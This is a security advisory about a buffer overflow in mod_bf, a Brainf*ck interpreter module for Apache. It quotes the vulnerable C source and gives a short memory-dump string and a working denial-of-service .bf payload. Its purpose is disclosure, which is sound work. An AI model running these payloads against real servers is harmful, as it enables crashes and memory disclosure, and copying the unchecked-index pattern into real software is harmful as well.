|
|
|
|
| |
| mod_bf is a brainf*ck interpreter that interprets .bf files on Apache webserver machines (Brainf*ck is very simple, low-level language that allows creation of fast running code snippets). A security vulnerability in the product allows remote attackers to execute arbitrary commands by overflowing an internal buffer. |
| |
Credit:
The information has been provided by Gobbles.
|
| |
Vulnerable systems:
mod_bf version 0.1 under FreeBSD ports
mod_bf version 0.2
Relevant code fragment from mod_bf.c:
#define ARR_SIZE 100
static char a[ARR_SIZE];
static int p;
...
static int bf_handler(request_rec *r)
{
...
memset (a, 0, ARR_SIZE);
p = 0;
...
if (!r->header_only)
interpret (c);
...
}
static void interpret(char *c)
{
int b;
char *d;
for (; *c; c++) {
switch (*c) {
case DEBUG_PR:
for (b = 0; b < 10; b++)
ap_rprintf (req, "a[%d]: %d" CRLF, b, a[b]);
ap_rprintf (req, "a[p]: %d p: %d" CRLF, a[p], p);
ap_rflush (req);
ap_reset_timeout (req);
break;
case '+':
a[p]++;
break;
case '-':
a[p]--;
break;
case '>':
p++;
break;
case '<':
p--;
break;
case '.':
if (ap_rputc (a[p], req) == EOF)
return;
ap_rflush (req);
ap_reset_timeout (req);
break;
case ',':
if ((a[p] = *req->args) == EOF || a[p] == CR)
a[p] = 0;
req->args++;
ap_reset_timeout (req);
break;
case '[':
/* the idea of the following is borrowed from bfi */
d = ++c;
for (b = 1; b && *c; c++)
b += (*c == '[' ? 1 : (*c == ']' ? -1 : 0));
if (!b) {
*--c = 0;
while (a[p])
interpret (d);
*c = ']';
}
break;
}
}
}
a[] is an array of 100 tiny bytes. p is an integer index that points out memory locations. It can be increased with > or decreased with <. The memory location pointed out by a[p] be modified with + or -.
An attacker can write something that increases p so that p >= 100 or decrease it so that p becomes negative, allowing him to set the location pointed out by a[p] to an arbitrary value (by only using the '+' or '-' signs).
Further, an attacker can dump sensitive memory by using the '.' command:
<.<.<.<.<.<.<.<.
DoS example:
$ cat > ~GOBBLES/public_html/bad.bf
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>
|
|
|
|
|
